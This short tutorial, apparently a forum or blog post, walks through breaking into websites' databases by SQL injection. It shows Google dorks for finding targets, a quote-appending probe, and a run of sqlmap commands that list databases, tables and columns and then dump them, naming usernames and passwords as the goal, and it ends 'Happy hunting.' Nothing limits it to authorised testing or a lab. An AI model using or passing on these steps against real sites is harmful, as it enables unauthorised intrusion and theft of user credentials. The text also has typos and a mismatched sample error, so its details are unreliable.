Before you want to break into a database of a site, we have to find a website ensure whether it is vulnerable or not. You can use google dorks for this.
A. for example: inurl:index.php?id=1 just go through a few sites and put ' at the end of theselected url. www.targetsite.com/index.php?id=1'. If it returns an error, then it is possibly vulnerable to sql injection, say like:
Warning: include(include/.php) [function.include]: failed to open stream: No such file or directory in /index.php on line 38
B. fireup sqlmap and enter the following commands:
- sqlmap -u targetsite.come/index.php?id=1 --dbs (It retrieves all database in the server)
- sqlmap -u targetsite.come/index.php?id=1 -D dbname --tables(it retrieves all tables in dbname)
- sqlmap -u targetsite.come/index.php?id=1 -D dbname -T tablename --columns (retrieves columns of tablename such as id, username, password)
- sqlmap -u targetsite.come/index.php?id=1 -D dbname -T tablename -C columnname --dump
Then you will get table along with specified column names. Bingo! Happy hunting. Thank you.